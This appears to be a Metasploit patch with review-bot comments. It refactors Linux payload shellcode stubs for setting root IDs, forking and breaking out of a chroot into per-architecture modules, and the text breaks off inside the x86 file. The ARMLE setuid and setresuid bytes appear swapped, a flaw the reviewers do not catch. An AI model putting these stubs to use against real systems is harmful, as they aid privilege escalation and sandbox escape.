From 0d632777fcb4692828b40747823c63e7bcf57ff6 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Thu, 19 Dec 2024 10:54:29 -0500 Subject: [PATCH 01/12] fix: splitting linux prepends to arch-specific mixins --- lib/msf/core/payload/linux.rb | 445 +------------------ lib/msf/core/payload/linux/armle/prepends.rb | 35 ++ lib/msf/core/payload/linux/ppc/prepends.rb | 74 +++ lib/msf/core/payload/linux/prepends.rb | 46 ++ lib/msf/core/payload/linux/x64/prepends.rb | 130 ++++++ lib/msf/core/payload/linux/x86/prepends.rb | 117 +++++ 6 files changed, 404 insertions(+), 443 deletions(-) create mode 100644 lib/msf/core/payload/linux/armle/prepends.rb create mode 100644 lib/msf/core/payload/linux/ppc/prepends.rb create mode 100644 lib/msf/core/payload/linux/prepends.rb create mode 100644 lib/msf/core/payload/linux/x64/prepends.rb create mode 100644 lib/msf/core/payload/linux/x86/prepends.rb diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb index 55216e622e29..4c1816a0f036 100644 --- a/lib/msf/core/payload/linux.rb +++ b/lib/msf/core/payload/linux.rb 
@@ -8,454 +8,13 @@ # ### module Msf::Payload::Linux - # # This mixin is chained within payloads that target the Linux platform. # It provides special prepends, to support things like chroot and setuid. # - def initialize(info = {}) - ret = super(info) - - register_advanced_options( - [ - Msf::OptBool.new('PrependFork', - [ - false, - "Prepend a stub that starts the payload in its own process via fork", - "false" - ] - ), - Msf::OptBool.new('PrependSetresuid', - [ - false, - "Prepend a stub that executes the setresuid(0, 0, 0) system call", - "false" - ] - ), - Msf::OptBool.new('PrependSetreuid', - [ - false, - "Prepend a stub that executes the setreuid(0, 0) system call", - "false" - ] - ), - Msf::OptBool.new('PrependSetuid', - [ - false, - "Prepend a stub that executes the setuid(0) system call", - "false" - ] - ), - Msf::OptBool.new('PrependSetresgid', - [ - false, - "Prepend a stub that executes the setresgid(0, 0, 0) system call", - "false" - ] - ), - Msf::OptBool.new('PrependSetregid', - [ - false, - "Prepend a stub that executes the setregid(0, 0) system call", - "false" - ] - ), - Msf::OptBool.new('PrependSetgid', - [ - false, - "Prepend a stub that executes the setgid(0) system call", - "false" - ] - ), - Msf::OptBool.new('PrependChrootBreak', - [ - false, - "Prepend a stub that will break out of a chroot (includes setreuid to root)", - "false" - ] - ), - Msf::OptBool.new('AppendExit', - [ - false, - "Append a stub that executes the exit(0) system call", - "false" - ] - ), - ], Msf::Payload::Linux) - - ret - end - - def apply_prepends(buf) - pre = '' - app = '' - - test_arch = [ *(self.arch) ] - - # Handle all x86 code here - if (test_arch.include?(ARCH_X86)) - - # Prepend - - if (datastore['PrependFork']) - pre << "\x6a\x02" + # pushb $0x2 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 ; fork # - "\x85\xc0" + # test %eax,%eax # - "\x74\x06" + # jz loc_000f # - # loc_0009: - "\x31\xc0" + # xor %eax,%eax # - "\xb0\x01" + # movb $0x1,%al # - "\xcd\x80" 
+ # int $0x80 ; exit # - # loc_000f: - "\xb0\x42" + # movb %0x42,%al # - "\xcd\x80" + # int $0x80 ; setsid # - - "\x6a\x02" + # pushb $0x2 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 ; fork # - "\x85\xc0" + # test %eax,%eax # - "\x75\xed" # jnz loc_0009 # - end - - if (datastore['PrependSetresuid']) - # setresuid(0, 0, 0) - pre << "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\xf7\xe3" + # mull %ebx # - "\xb0\xa4" + # movb $0xa4,%al # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetreuid']) - # setreuid(0, 0) - pre << "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x46" + # pushl $0x46 # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetuid']) - # setuid(0) - pre << "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x17" + # pushl $0x17 # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetresgid']) - # setresgid(0, 0, 0) - pre << "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\xf7\xe3" + # mull %ebx # - "\xb0\xaa" + # movb $0xaa,%al # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetregid']) - # setregid(0, 0) - pre << "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x47" + # pushl $0x47 # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetgid']) - # setgid(0) - pre << "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x2e" + # pushl $0x2e # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependChrootBreak']) - # setreuid(0, 0) - pre << "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x46" + # pushl $0x46 # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - - # break chroot - pre << "\x6a\x3d" + # pushl $0x3d # - # build dir str (ptr in ebx) - "\x89\xe3" + # movl %esp,%ebx # - # mkdir(dir) - "\x6a\x27" + # pushl $0x27 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 # - # chroot(dir) - 
"\x89\xd9" + # movl %ebx,%ecx # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 # - # build ".." str (ptr in ebx) - "\x31\xc0" + # xorl %eax,%eax # - "\x50" + # pushl %eax # - - "\x66\x68\x2e\x2e" + # pushw $0x2e2e # - "\x89\xe3" + # movl %esp,%ebx # - # loop changing dir - "\x6a\x3d" + # pushl $0x1e # - "\x59" + # popl %ecx # - "\xb0\x0c" + # movb $0xc,%al # - "\xcd\x80" + # int $0x80 # - "\xe2\xfa" + # loop -6 # - # final chroot - "\x6a\x3d" + # pushl $0x3d # - "\x89\xd9" + # movl %ebx,%ecx # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - end - - # Append exit(0) - - if (datastore['AppendExit']) - app << "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x01" + # pushl $0x01 # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - end - - # Handle all Power/CBEA code here - elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ])) - - # Prepend - - if (datastore['PrependSetresuid']) - # setresuid(0, 0, 0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\xa5" + # addi r0,r31,-347 # - "\x44\xff\xff\x02" # sc # - end - - if (datastore['PrependSetreuid']) - # setreuid(0, 0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x47" + # addi r0,r31,-441 # - "\x44\xff\xff\x02" # sc # - end - - if (datastore['PrependSetuid']) - # setuid(0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x18" + # addi r0,r31,-488 # - "\x44\xff\xff\x02" # sc # - end - - if (datastore['PrependSetresgid']) - # setresgid(0, 0, 0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\xab" + # addi r0,r31,-341 # - "\x44\xff\xff\x02" # sc # - end - - if (datastore['PrependSetregid']) - 
# setregid(0, 0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x48" + # addi r0,r31,-440 # - "\x44\xff\xff\x02" # sc # - end - if (datastore['PrependSetgid']) - # setgid(0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x2f" + # addi r0,r31,-465 # - "\x44\xff\xff\x02" # sc # - end - - if (datastore['PrependChrootBreak']) - # setreuid(0, 0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x47" + # addi r0,r31,-441 # - "\x44\xff\xff\x02" # sc # - - # EEK! unsupported... - end - - # Append exit(0) - - if (datastore['AppendExit']) - app << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x02" + # addi r0,r31,-510 # - "\x44\xff\xff\x02" # sc # - end - - elsif (test_arch.include?(ARCH_X64)) - - if (datastore['PrependFork']) - # if (fork()) { exit(0); }; setsid(); if (fork()) { exit(0); }; - pre << "\x6a\x39" # push 57 ; __NR_fork # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - pre << "\x48\x85\xc0" # test rax,rax # - pre << "\x74\x08" # jz loc_0012 # - # # loc_000a: # - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x6a\x3c" # push 60 ; __NR_exit # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - # # loc_0012: # - pre << "\x04\x70" # add al, 112 ; __NR_setsid # - pre << "\x0f\x05" # syscall # - pre << "\x6a\x39" # push 57 ; __NR_fork # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - pre << "\x48\x85\xc0" # test rax,rax # - pre << "\x75\xea" # jnz loc_000a # - end - - if (datastore['PrependSetresuid']) - # setresuid(0, 0, 0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x48\x89\xfe" # mov rsi,rdi # - pre << "\x6a\x75" # push 0x75 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - end - - if (datastore['PrependSetreuid']) - # 
setreuid(0, 0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x48\x89\xfe" # mov rsi,rdi # - pre << "\x48\x89\xf2" # mov rdx,rsi # - pre << "\x6a\x71" # push 0x71 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - end - - if (datastore['PrependSetuid']) - # setuid(0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x6a\x69" # push 0x69 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - end - - if (datastore['PrependSetresgid']) - # setresgid(0, 0, 0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x48\x89\xfe" # mov rsi,rdi # - pre << "\x6a\x77" # push 0x77 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - end - - if (datastore['PrependSetregid']) - # setregid(0, 0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x48\x89\xfe" # mov rsi,rdi # - pre << "\x48\x89\xf2" # mov rdx,rsi # - pre << "\x6a\x72" # push 0x72 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - end - - if (datastore['PrependSetgid']) - # setgid(0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x6a\x6a" # push 0x6a # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - end - - if (datastore['PrependChrootBreak']) - - # setreuid(0, 0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x48\x89\xfe" # mov rsi,rdi # - pre << "\x48\x89\xf8" # mov rax,rdi # - pre << "\xb0\x71" # mov al,0x71 # - pre << "\x0f\x05" # syscall # - - # generate temp dir name - pre << "\x48\xbf" # mov rdi, # - pre << Rex::Text.rand_text_alpha(8) # random # - pre << "\x56" # push rsi # - pre << "\x57" # push rdi # - - # mkdir(random,0755) - pre << "\x48\x89\xe7" # mov rdi,rsp # - pre << "\x66\xbe\xed\x01" # mov si,0755 # - pre << "\x6a\x53" # push 0x53 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - - # chroot(random) - pre << "\x48\x31\xd2" # xor rdx,rdx # - pre << "\xb2\xa1" # mov dl,0xa1 # - pre << "\x48\x89\xd0" # mov rax,rdx # - pre << "\x0f\x05" # syscall # - - # build .. 
(ptr in rdi ) - pre << "\x66\xbe\x2e\x2e" # mov si,0x2e2e # - pre << "\x56" # push rsi # - pre << "\x48\x89\xe7" # mov rdi,rsp # - - # loop chdir(..) 69 times - # syscall tend to modify rcx can't use loop... - pre << "\x6a\x45" # push 0x45 # - pre << "\x5b" # pop rbx # - pre << "\x6a\x50" # push 0x50 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - pre << "\xfe\xcb" # dec bl # - pre << "\x75\xf7" # jnz -7 # - - # chroot (.) (which should be /) - pre << "\x6a\x2e" # push . (0x2e) # - pre << "\x48\x89\xe7" # mov rdi,rsp # - pre << "\x48\x89\xd0" # mov rax,rdx # - pre << "\x0f\x05" # syscall # - - end - - # Append exit(0) - - if (datastore['AppendExit']) - app << "\x48\x31\xff" # xor rdi,rdi # - app << "\x6a\x3c" # push 0x3c # - app << "\x58" # pop rax # - app << "\x0f\x05" # syscall # - end - - elsif (test_arch.include?(ARCH_ARMLE)) - - if (datastore['PrependSetuid']) - # setuid(0) - pre << "\x00\x00\x20\xe0" # eor r0, r0, r0 # - pre << "\x17\x70\xa0\xe3" # mov r7, #23 # - pre << "\x00\x00\x00\xef" # svc # - end - - if (datastore['PrependSetresuid']) - # setresuid(ruid=0, euid=0, suid=0) - pre << "\x00\x00\x20\xe0" # eor r0, r0, r0 # - pre << "\x01\x10\x21\xe0" # eor r1, r1, r1 # - pre << "\x02\x20\x22\xe0" # eor r2, r2, r2 # - pre << "\xa4\x70\xa0\xe3" # mov r7, #0xa4 # - pre << "\x00\x00\x00\xef" # svc # - end - end - - return (pre + buf + app) + def initialize(info = {}) + super(info) end - end diff --git a/lib/msf/core/payload/linux/armle/prepends.rb b/lib/msf/core/payload/linux/armle/prepends.rb new file mode 100644 index 000000000000..90612a220791 --- /dev/null +++ b/lib/msf/core/payload/linux/armle/prepends.rb 
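Review bot: The surviving module comment "It provides special prepends, to support things like chroot and setuid." is now stale, since this hunk removes both the option registration and `apply_prepends` from `Msf::Payload::Linux`; replace it with `# Arch-specific prepend/append stubs live in Msf::Payload::Linux::<Arch>::Prepends.` so readers are pointed at the right place. Any payload that still includes only `Msf::Payload::Linux` (the x64 stagers renamed later in this series still do) appears to lose the Prepend*/AppendExit options and the `apply_prepends` method without any error; if that is intended, the commit message should say so, otherwise those modules also need the arch-specific mixin. The remaining `initialize(info = {}) super(info) end` is a pure pass-through and could be dropped entirely unless something depends on the module defining it.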
@@ -0,0 +1,35 @@ +module Msf + module Payload::Linux::Armle::Prepends + include Msf::Payload::Linux::Prepends + + def prepends_order + %w[PrependSetresuid PrependSetuid] + end + + def appends_order + %w[] + end + + def prepends_map + { + # 'PrependFork' => "", + + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # + "\x17\x70\xa0\xe3" + # mov r7, #23 # + "\x00\x00\x00\xef", # svc # + + # setuid(0) + 'PrependSetuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # + "\x01\x10\x21\xe0" + # eor r1, r1, r1 # + "\x02\x20\x22\xe0" + # eor r2, r2, r2 # + "\xa4\x70\xa0\xe3" + # mov r7, #0xa4 # + "\x00\x00\x00\xef" # svc # + } + end + + def appends_map + {} + end + end +end \ No newline at end of file diff --git a/lib/msf/core/payload/linux/ppc/prepends.rb b/lib/msf/core/payload/linux/ppc/prepends.rb new file mode 100644 index 000000000000..9379735f036d --- /dev/null +++ b/lib/msf/core/payload/linux/ppc/prepends.rb 
@@ -0,0 +1,74 @@ +module Msf + module Payload::Linux::Ppc::Prepends + include Msf::Payload::Linux::Prepends + + def prepends_order + %w[PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid] + end + + def appends_order + %w[AppendExit] + end + + def prepends_map + { + # 'PrependFork' => "", + + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\xa5" + # addi r0,r31,-347 # + "\x44\xff\xff\x02", # sc # + + # setreuid(0, 0) + 'PrependSetreuid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x47" + # addi r0,r31,-441 # + "\x44\xff\xff\x02", # sc # + + # setuid(0) + 'PrependSetuid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x18" + # addi r0,r31,-488 # + "\x44\xff\xff\x02", # sc # + + # setresgid(0, 0, 0) + 'PrependSetresgid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\xab" + # addi r0,r31,-341 # + "\x44\xff\xff\x02", # sc # + + # setregid(0, 0) + 'PrependSetregid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x48" + # addi r0,r31,-440 # + "\x44\xff\xff\x02", # sc # + + # setgid(0) + 'PrependSetgid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x2f" + # addi r0,r31,-465 # + "\x44\xff\xff\x02" # sc # + + # setreuid(0, 0) = break chroot + # 'PrependChrootBreak' => + } + end + + def appends_map + { + # exit(0) + 'AppendExit' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x02" + # addi r0,r31,-510 # + "\x44\xff\xff\x02" # sc 
# + } + end + end +end \ No newline at end of file diff --git a/lib/msf/core/payload/linux/prepends.rb b/lib/msf/core/payload/linux/prepends.rb new file mode 100644 index 000000000000..05c9e658fe2a --- /dev/null +++ b/lib/msf/core/payload/linux/prepends.rb 
@@ -0,0 +1,46 @@ + +module Msf + module Payload::Linux::Prepends + + def initialize(info) + super(info) + register_prepend_options + end + + def register_prepend_options + all_options = { + 'PrependFork' => [false, 'Prepend a stub that starts the payload in its own process via fork', 'false'], + 'PrependSetresuid' => [false, 'Prepend a stub that executes the setresuid(0, 0, 0) system call', 'false'], + 'PrependSetreuid' => [false, 'Prepend a stub that executes the setreuid(0, 0) system call', 'false'], + 'PrependSetuid' => [false, 'Prepend a stub that executes the setuid(0) system call', 'false'], + 'PrependSetresgid' => [false, 'Prepend a stub that executes the setresgid(0, 0, 0) system call', 'false'], + 'PrependSetregid' => [false, 'Prepend a stub that executes the setregid(0, 0) system call', 'false'], + 'PrependSetgid' => [false, 'Prepend a stub that executes the setgid(0) system call', 'false'], + 'PrependChrootBreak' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'], + 'AppendExit' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'] + } + avaiable_options = [] + for prepend in prepends_order + avaiable_options.append(Msf::OptBool.new(prepend, all_options.fetch(prepend))) + end + for append in appends_order + avaiable_options.append(Msf::OptBool.new(append, all_options.fetch(append))) + end + register_advanced_options(avaiable_options, Msf::Payload::Linux) + end + + def apply_prepends(buf) + pre = '' + app = '' + for name in prepends_order.each + pre << prepends_map.fetch(name) if datastore[name] + end + for name in appends_order.each + app << appends_map.fetch(name) if datastore[name] + end + pre.force_encoding('ASCII-8BIT') + + buf.force_encoding('ASCII-8BIT') + + app.force_encoding('ASCII-8BIT') + end + end +end diff --git a/lib/msf/core/payload/linux/x64/prepends.rb b/lib/msf/core/payload/linux/x64/prepends.rb new file mode 100644 index 000000000000..8a1ae58a467a 
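Review bot: The `AppendExit` entry in `all_options` carries the PrependChrootBreak description ("Prepend a stub that will break out of a chroot ..."), so the advanced option will be mislabelled in `show advanced`; it should read `'AppendExit' => [false, 'Append a stub that executes the exit(0) system call', 'false'],` as in the code being replaced. In `apply_prepends`, `buf.force_encoding('ASCII-8BIT')` re-encodes the caller's string in place rather than a copy, and `for name in prepends_order.each` mixes a `for` loop with `.each` and rebuilds `prepends_map` (which on x64 calls `Rex::Text.rand_text_alpha`) on every iteration; the rewrite below uses `each_with_object` and `String#b`. `avaiable_options` is misspelled (`available_options`), and the module relies on the includer defining four methods, so a header comment such as `# Including modules must define prepends_order, appends_order, prepends_map and appends_map.` would document that contract.
```ruby
def apply_prepends(buf)
  pre_map = prepends_map # build each map once; the x64 map calls Rex::Text.rand_text_alpha
  app_map = appends_map
  pre = prepends_order.each_with_object(+'') { |name, s| s << pre_map.fetch(name) if datastore[name] }
  app = appends_order.each_with_object(+'') { |name, s| s << app_map.fetch(name) if datastore[name] }
  # String#b returns a binary-encoded copy, so the caller's buf is not re-encoded in place
  pre.b + buf.b + app.b
end
```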
--- /dev/null +++ b/lib/msf/core/payload/linux/x64/prepends.rb 
@@ -0,0 +1,130 @@ +module Msf + module Payload::Linux::X64::Prepends + include Msf::Payload::Linux::Prepends + def prepends_order + %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid] + end + + def appends_order + %w[] + end + + def prepends_map + { 'PrependFork' => "\x6a\x39" + # push 57 ; __NR_fork # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + "\x48\x85\xc0" + # test rax,rax # + "\x74\x08" + # jz loc_0012 # + # loc_000a: # + "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x3c" + # push 60 ; __NR_exit # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + # loc_0012: # + "\x04\x70" + # add al, 112 ; __NR_setsid # + "\x0f\x05" + # syscall # + "\x6a\x39" + # push 57 ; __NR_fork # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + "\x48\x85\xc0" + # test rax,rax # + "\x75\xea", # jnz loc_000a # + + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x6a\x75" + # push 0x75 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + + # setreuid(0, 0) + 'PrependSetreuid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x48\x89\xf2" + # mov rdx,rsi # + "\x6a\x71" + # push 0x71 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + + # setuid(0) + 'PrependSetuid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x69" + # push 0x69 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + + # setresgid(0, 0, 0) + 'PrependSetresgid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x6a\x77" + # push 0x77 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + + # setregid(0, 0) + 'PrependSetregid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x48\x89\xf2" + # mov rdx,rsi # + "\x6a\x72" + # push 0x72 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + + # setgid(0) + 'PrependSetgid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x6a" + # push 0x6a # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + + # setreuid(0, 0) + break chroot + 
'PrependChrootBreak' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x48\x89\xf8" + # mov rax,rdi # + "\xb0\x71" + # mov al,0x71 # + "\x0f\x05" + # syscall # + # generate temp dir name + "\x48\xbf#{Rex::Text.rand_text_alpha(8)}" + # mov rdi, # + "\x56" + # push rsi # + "\x57" + # push rdi # + # mkdir(random,0755) + "\x48\x89\xe7" + # mov rdi,rsp # + "\x66\xbe\xed\x01" + # mov si,0755 # + "\x6a\x53" + # push 0x53 # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + + # chroot(random) + "\x48\x31\xd2" + # xor rdx,rdx # + "\xb2\xa1" + # mov dl,0xa1 # + "\x48\x89\xd0" + # mov rax,rdx # + "\x0f\x05" + # syscall # + + # build .. (ptr in rdi ) + "\x66\xbe\x2e\x2e" + # mov si,0x2e2e # + "\x56" + # push rsi # + "\x48\x89\xe7" + # mov rdi,rsp # + + # loop chdir(..) 69 times + # syscall tend to modify rcx can't use loop... + "\x6a\x45" + # push 0x45 # + "\x5b" + # pop rbx # + "\x6a\x50" + # push 0x50 # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + "\xfe\xcb" + # dec bl # + "\x75\xf7" + # jnz -7 # + + # chroot (.) (which should be /) + "\x6a\x2e" + # push . (0x2e) # + "\x48\x89\xe7" + # mov rdi,rsp # + "\x48\x89\xd0" + # mov rax,rdx # + "\x0f\x05" # syscall # + } + end + + def appends_map + { + # exit(0) + 'AppendExit' => "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x3c" + # push 0x3c # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + } + end + end +end \ No newline at end of file diff --git a/lib/msf/core/payload/linux/x86/prepends.rb b/lib/msf/core/payload/linux/x86/prepends.rb new file mode 100644 index 000000000000..461d4b8c4fee --- /dev/null +++ b/lib/msf/core/payload/linux/x86/prepends.rb 
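Review bot: `prepends_order` lists only `PrependFork PrependSetresuid PrependSetreuid PrependSetuid` and `appends_order` is empty, yet `prepends_map` defines PrependSetresgid, PrependSetregid, PrependSetgid and PrependChrootBreak and `appends_map` defines AppendExit; because `register_prepend_options` only registers names from the order lists, those stubs become unreachable and x64 payloads lose options the removed `linux.rb` branch supported. Change the two lines to `%w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid PrependChrootBreak]` and `%w[AppendExit]`. Note also that `"\x48\xbf#{Rex::Text.rand_text_alpha(8)}"` is evaluated each time `prepends_map` is called, so the directory name differs between calls; harmless as long as the map is built once per `apply_prepends`, which is worth a short comment on that entry.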
@@ -0,0 +1,117 @@ +module Msf + module Payload::Linux::X86::Prepends + def prepends_order + %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid PrependChrootBreak] + end + + def appends_order + %w[AppendExit] + end + def prepends_map + { + 'PrependFork' => "\x6a\x02" + # pushb $0x2 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 ; fork # + "\x85\xc0" + # test %eax,%eax # + "\x74\x06" + # jz loc_000f # + # loc_0009: + "\x31\xc0" + # xor %eax,%eax # + "\xb0\x01" + # movb $0x1,%al # + "\xcd\x80" + # int $0x80 ; exit # + # loc_000f: + "\xb0\x42" + # movb %0x42,%al # + "\xcd\x80" + # int $0x80 ; setsid # + "\x6a\x02" + # pushb $0x2 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 ; fork # + "\x85\xc0" + # test %eax,%eax # + "\x75\xed", # jnz loc_0009 # + + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\xf7\xe3" + # mull %ebx # + "\xb0\xa4" + # movb $0xa4,%al # + "\xcd\x80", # int $0x80 # + + # setreuid(0, 0) + 'PrependSetreuid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x46" + # pushl $0x46 # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # + + # setuid(0) + 'PrependSetuid' => "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x17" + # pushl $0x17 # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # + + # setresgid(0, 0, 0) + 'PrependSetresgid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\xf7\xe3" + # mull %ebx # + "\xb0\xaa" + # movb $0xaa,%al # + "\xcd\x80", # int $0x80 # + + # setregid(0, 0) + 'PrependSetregid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x47" + # pushl $0x47 # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # + + # setgid(0) + 'PrependSetgid' => "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x2e" + # pushl $0x2e # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # + + # setreuid(0, 0) = break chroot + 'PrependChrootBreak' => 
